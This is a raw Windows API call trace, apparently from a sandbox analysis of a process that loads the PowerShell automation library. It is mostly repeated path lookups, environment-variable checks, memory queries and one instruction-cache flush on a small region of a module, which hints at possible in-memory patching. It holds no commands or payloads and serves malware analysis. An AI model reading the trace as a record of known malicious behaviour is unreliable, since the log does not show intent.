	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x35002796e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.193] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.193] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.199] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.199] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.213] GetSystemInfo (in: lpSystemInfo=0x3500278d60 | out: lpSystemInfo=0x3500278d60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0057.214] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5cd68000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0057.250] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.250] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.251] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.251] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.491] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.491] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.514] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.514] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.522] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5cd68000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0057.647] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.647] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.648] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.648] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.649] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.650] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.655] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.655] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.660] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.660] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.661] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0057.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.661] CoTaskMemFree (pv=0x233e39140d0) 
	[0057.729] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5cd68000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0057.734] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5cd68000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.119] lstrlenW (lpString="䅁") returned 1
	[0058.163] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5cd68000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.206] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0058.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.206] CoTaskMemFree (pv=0x233e39140d0) 
	[0058.207] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x7ffbf4b625d0, dwSize=0x8) returned 1
	[0058.488] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x233e39140d0
	[0058.563] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.607] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.608] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.609] VirtualQuery (in: lpAddress=0x277860, lpBuffer=0x3500278720, dwLength=0x30 | out: lpBuffer=0x3500278720*(BaseAddress=0x277000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca59000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.659] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.659] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.659] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
